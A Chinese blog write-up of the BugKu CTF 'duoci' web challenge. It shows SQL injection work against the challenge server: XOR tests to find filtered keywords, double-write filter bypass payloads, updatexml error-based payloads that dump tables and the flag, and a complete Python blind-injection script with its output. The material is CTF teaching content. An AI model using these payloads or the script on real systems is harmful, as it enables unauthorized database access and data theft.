BugKu-多次

最新推荐文章于 2024-08-10 02:34:02 发布
最新推荐文章于 2024-08-10 02:34:02 发布
阅读量658 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/84576351
版权

多次

原题链接

http://120.24.86.145:9004

分析

  • 单引号出错
  • 加上%23,发现不出错了
  • 加上' and 1=1%23
    又出错了,应该是过滤了

这里学习到一个新知识,如何判断过滤了哪些字符?

采用异或注入。
在id=1后面输入 '(0)'
发现不出错,那就将0换成1=1
如果出错,那就是成功了

如果括号里面的判断是假的,那么页面就会显示正确
那么同理,
如果我修改里面的内容为length(‘union’)!=0
如果页面显示正确,那就证明length(‘union’)==0的,也就是union被过滤了

11129189-ba2fb1d8163b1664.png

同样道理,测试出过滤字符 select,union,and,or

可以采用双写绕过。测试payload:

http://120.24.86.145:9004/1ndex.php?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,2%23

页面结果
2

database:

?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,database()%23

 web1002-1

tables:

注意information里面有or,要双写过滤
?id=-1' ununionion seselectlect 1, group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() #

页面结果
flag1,hint

columns:

?id=-1' ununionion seselectlect 1, group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name='flag1' %23

页面结果
flag1,address

dump:

?id=-1' ununionion seselectlect 1, group_concat(flag1) from flag1 %23

页面结果
usOwycTju+FTUUzXosjr

?id=-1' ununionion seselectlect 1, group_concat(address) from flag1 %23

页面结果
./Once_More.php
下一关地址

进入链接


11129189-cb76853e1f61e098.png

测试?id=1'
报错

My Id =1'
Nobody!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

我还是一样的办法测试过滤

union substr sleep

双写无法绕过,大小写无法绕过,/*!*/无法绕过。
更换函数,利用updatexml报错。

payload

# 查表
http://120.24.86.145:9004/Once_More.php?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),3) %23
# 结果
Nobody!
XPATH syntax error: '~class,flag2~'

# 查字段
?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag2'),'~'),3) %23
# 结果
Nobody!
XPATH syntax error: '~flag2,address~'

# 查数据
?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23
# 结果
Nobody!
XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'

本题也可以用布尔盲注来做,毕竟有回显和明显的TF标志,因为碰巧也在学习盲注,做了一下,这里附上脚本:

import requests

def length_schema():
    for x in range(1,20):
        url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20length(database())='+str(x)+'%23'
        s = requests.get(url)
        if "Hello" in s.text:
            print 'schema_length is :' + str(x)
            global a
            a = int(x)
            break
        
def schema_name():
    x = 0
    name = ''
    while x < a:
        x = x + 1
        temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~' 
        for i in temp:
            url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20mid(database(),'+ str(x) +',1)=%27'+str(i)+'%27%23'
            s = requests.get(url)
            if "Hello" in s.text:
                name = name + str(i)

    print 'sechma_name is :' + name
    global schema_name
    schema_name = name

def all():
    temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
    temp_data = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    for x in xrange(0,20):
        table_name = ''
        for y in xrange(1,20):
            key = 0
            for i in temp:
                url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27'+schema_name+'%27%20limit%20'+str(x)+',1),'+str(y)+',1))=ascii(\''+str(i)+'\')%23'
                s = requests.get(url)
                if "Hello" in s.text:
                    key = 1
                    table_name = table_name + str(i)
            if key == 0:
                break
        if table_name == '':
            break
        print 'one of tables is:' + table_name
        for p in xrange(0,20):
            column_name = ''
            for q in xrange(1,20):
                key = 0
                for i in temp:
                    url_columns = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27'+schema_name+'%27%20and%20table_name=%27'+table_name+'%27limit%20'+str(p)+',1),'+str(q)+',1))=ascii(\''+str(i)+'\')%23'
                    s = requests.get(url_columns)
                    if "Hello" in s.text:
                        key = 1
                        column_name = column_name + str(i)
                if key ==0:
                    break
            if column_name == '':
                break
            print 'a column name of '+table_name+' is '+column_name
            for y in xrange(0,10):
                data = ''
                for z in xrange(1,20):
                    key = 0
                    for i in temp_data:
                        url_data = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20'+column_name+'%20from%20`'+schema_name+'`.'+table_name+'%20limit%20'+str(y)+',1),'+str(z)+',1))=ascii(\''+str(i)+'\')%23'
                        s = requests.get(url_data)
                        if "Hello" in s.text:
                            data = data + str(i)
                            key = 1
                    if key == 0:
                        break
                if data == '':
                    break
                print 'one data of '+schema_name+'.'+table_name+'\'s '+column_name+' is '+data

def main():
    length_schema()
    schema_name()
    all()
if __name__ == '__main__':
    main()

结果

schema_length is :9
sechma_name is :web1002-2
one of tables is:class
a column name of class is id
one data of web1002-2.class's id is 1
one data of web1002-2.class's id is 2
one data of web1002-2.class's id is 3
one data of web1002-2.class's id is 4
one data of web1002-2.class's id is 5
one data of web1002-2.class's id is 6
one data of web1002-2.class's id is 7
a column name of class is name
one data of web1002-2.class's name is TOM
one data of web1002-2.class's name is Jack
one data of web1002-2.class's name is Mack
one data of web1002-2.class's name is Jones
one data of web1002-2.class's name is James
one data of web1002-2.class's name is Fox
one data of web1002-2.class's name is Henry
one of tables is:flag2
a column name of flag2 is flag2
one data of web1002-2.flag2's flag2 is flag{Bugku-sql_6s-2
a column name of flag2 is address
one data of web1002-2.flag2's address is .
[Finished in 1620.8s]

flag

flag{bugku-sql_6s-2i-4t-bug}

知识点

报错注入,基本的过滤和绕过,布尔盲注

「已注销」
关注
bugku(代码审计 wp)
qq_42812036的博客
02-18 781
我这给出的是涉及到的陌生的知识点,结合链接文章中详细的源码和答案 https://blog.csdn.net/xiaorouji/article/details/82292233 extract变量覆盖 构造?flag=1&content=1 strcmp比较字符串 题目已经对strcmp函数有了解释: if (strcmp($_GET[‘a’], $flag) == 0) //如...
二、Bugku-----这么多数据包找找吧,先找到getshell的流------流量分析题------TCP
qwsn
10-14 2477
一、题目: **题目网盘链接:**https://pan.baidu.com/s/1M5mi9nvkj7v-DA2w1qOt0g 提取码:vn78 二、解题步骤: 1.使用wireshark打开CTF.pcapng 2.打开后开始分析代码 ①首先看到,2到4和7到8为ARP广播请求包,8为ARP单播应答包 src.ip:192.168.116.161 dst.ip:192.168.116....
Bugku 多次
Superpig的博客
11-19 435
步骤 1、打开题目链接,发现url传入了参数id=1,当改参数为id=1’ 时显示有错误,改为id=1&amp;quot;时没有错误,因此,判断是错误注入 2、首先判断什么情况下会报错,方法:异或注入 id=1’^(0)%23 时,正常运行(%23是#的url编码) id=1’^(1)%23 时,报错 因此,判断出,当括号里的表达式为真时报错 3、判断过滤了哪些字符 id=1’(length(‘union’)...
BugKu CTF Misc:眼见非实 & 啊哒 & ping & Snowfall
最新发布
Flag少侠的博客
08-10 8800
BugKu是一个由乌云知识库(wooyun.org)推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全的平台,供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景,如Web漏洞、系统漏洞、密码学等,参与者需要通过解决这些漏洞来获取Flag。
Bugku_多次
weixin_43749601的博客
10-24 299
打开题目,发现页面上啥也没有,但是URl地址栏里有id的参数传进去,将id=1 换成id=2,页面信息发生变化,立马就想到了可能存在SQL注入。 测试闭合方式 id=1' //报错 id=1" //不报错 此时确定闭合方式为单引号闭合 接着可以利用异或方式测试一下是否有对一些SQL注入的关键字有过滤。例如^(length(‘or’)!=0)如果返回页面显示正常,那就证明length(‘or’)==0的,也就是or被过滤了,通过测试发现,select or and union被过滤了,但是我们可以.
bugku 多次
小白渣的博客
09-14 191
加粗样式 这题分为两个关卡,都是sql注入的。第一关是关键字and、or、union、select过滤,第二关是报错注入。 分析 单引号出错 加上%23,发现不出错了 加上' and 1=1%23 又出错了,应该是过滤了 采用异或判断(即相同的条件即为假) 采用异或注入。 在id=1后面输入 '(0)' 发现不出错,那就将0换成1=1 如果出错,那就是成功了 如果括号里面的判断是假的,那么页面...
爬虫笔记-Bugku秋名山老司机(入门)
12-21
多刷新几次可见题目提示,需要用post传入值,变量名为value 创建py文件,导入 requests 库和 re 库 并且创建一个会话对象,用它发送一个get请求 # requests库用于发送请求 # re库用于匹配正则表达式 import ...
bugku-pwn-wp
令则
03-27 451
bugku 文章目录bugkupwn1pwn2pwn3pwn4pwn5 pwn1 这个是典型的新手题了,nc连上去就有shell, 直接可以拿到flag。 pwn2 main函数 这里我们看到read函数位置会出现一个典型的栈溢出。 然后我们计算下溢出位置到返回值之间的距离,就可以控制程序流程了, 接下来我们看到函数中存在一个get_shell_函数: 然后就可以着手写exp,这里简单写下pa...
Bugku-Misc合集
似水流年
08-28 1627
#Misc – Bugku(合集)# ##链接## ###签到### 扫描二维码关注公众号 即可获得flag flag{Bugku-Sec-pwn!} ###这是一张单纯的图片### 链接 将文件1.jpg放入Winhex 在文件尾部看到一串数字 &#107;&#101;&#121;&#123;&#121;&#111;&#117;&#32;&#97;&#114;&#101;&#32;&#114;&amp
bugku-秋名山老司机
STARSG0d的博客
06-17 6525
秋名山老司机: 打开链接,让我们在2秒之内计算出一个很复杂的式子的值传进去 刷新式子一直在变化,不过出来一个提示让我们以post方式传入计算的值,变量名字为value,如果你真的拿计算机去计算传值,嘿嘿嘿! 查看源代码没有什么提示 百度知道这道题是快速反弹post请求,什么意思呢?HTTP 响应头获取了一段有效期很短的 key 值后,需要将经过处理后的 key 值快速 POST 给服务器,...
bugku ctf 多次
qq_42777804的博客
08-03 444
打开网站后发现 分别将 id=1 2 3 4 5 有不同的提示,等于6时报错 学到大佬的一个方法, 如何判断过滤了哪些字符? 采用异或注入。 如果括号里面的判断是假的,那么页面就会显示正确 构造 ?id=1'^(length('union')!=0)^' 如果我修改里面的内容为length(‘union’)!=0 如果页面显示正确,...
bugku-多次 (详细)
偷一个月亮
06-20 1858
第一个考点:异或注入判断过滤关键字 ?id=1’^(length(‘union’)!=0)–+ 过滤的用双写绕过 GET /1ndex.php?id=-1' ununionion selselectect 2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7765623130...
bugku-多次
热门推荐
烟敛寒林的博客
10-27 2万+
这题分为两个关卡,都是sql注入的。第一关是关键字and、or、union、select过滤,第二关是报错注入。 测试 进入第一关没有什么提示信息,但是url地址栏 ?id=1 可能存在注入 id=1' 会报错,后面加--+注释返回正常,确定存在SQL注入 ?id=1'or 1=1--+ 也报错,可能存在过滤 尝试双写绕过,?id=1'oorr 1=1--+ 返回正常 ...
多次 - BugKuCTF
h0ld1rs的博客
10-20 165
文章目录第一关异或注入第二关报错注入 这道题有两个sql注入 第一关 很明显的SQL注入,加入单引号报错 添加注释符--+,正常回显,注意#无正常回显,应该是被过滤了 添加or 1 = 1,发现报错 异或注入 重点来了,异或注入,可以判断一些是否过滤掉的字符 用法::两个条件相同(同真或同假)即为假 ?id=1'^(length('union')!=0)--+ 我们已经知道id=1必然为真,那么后面为真的时候,回显将会有错误,如果后面是假,则会回显正常。 当!=0回显为真,说明不等于0为假,说明
bugku中的多次题目以及学到的异或注入
mylyylmy的博客
08-01 3166
首先我们判断一下是什么注入类型 注意输入的是英文字符',中文不会转变为%27,报错,说明是字符注入 这时候我们就要判断一下SQL网站过滤了什么内容,我们可以使用异或注入来判断哪些字符串被过滤掉了 http://120.24.86.145:9004/1ndex.php?id=1%27^(0)%23 正常运行,我们在输入 http://120.24.86.145:9004/1nde...
bugku-Web-多次(异或注入,判断被过滤的关键字)☆
Sea_Sand息禅
12-13 957
进去看到url感觉是sql注入, 加上',报错但是%23不报错,加上'--+,也不报错,说明可以用--+注释 加上' or 1=1--+,报错 尝试' oorr 1=1--+,正常 说明or被过滤了. 那么怎么判断哪些关键字被过滤了呢,这里用到异或注入(同真异假)。 http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0...
多次 - BugKuCTF(SQL注入绕过)
小水池
09-14 9224
登陆后发现页面没有啥信息,但是url地址栏?id=1 可能存在注入 id=1后面加单引号会报错,后面加--+注释返回正常,确定存在SQL注入 ?id=1'or 1=1--+ 也报错,可能存在过滤 尝试双写绕过,?id=1'oorr 1=1--+ 返回正常 那如何检测哪些字符串被过滤了呢?新技能GET! 异或注入了解一下,两个条件相同(同真或同假)即为假 http://120....
BugkuCTF之web题之多次
A_dmin的博客
12-10 7648
BugkuCTF之web题之多次
bugku chatgpt-1
10-09
ChatGPT是一种由OpenAI训练的大型语言模型。它的原理是基于Transformer架构,通过预训练大量文本数据来学习如何生成人类可读的文本,然后通过接受输入并生成输出来实现对话。 ChatGPT的用途非常广泛,可以用于自然...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值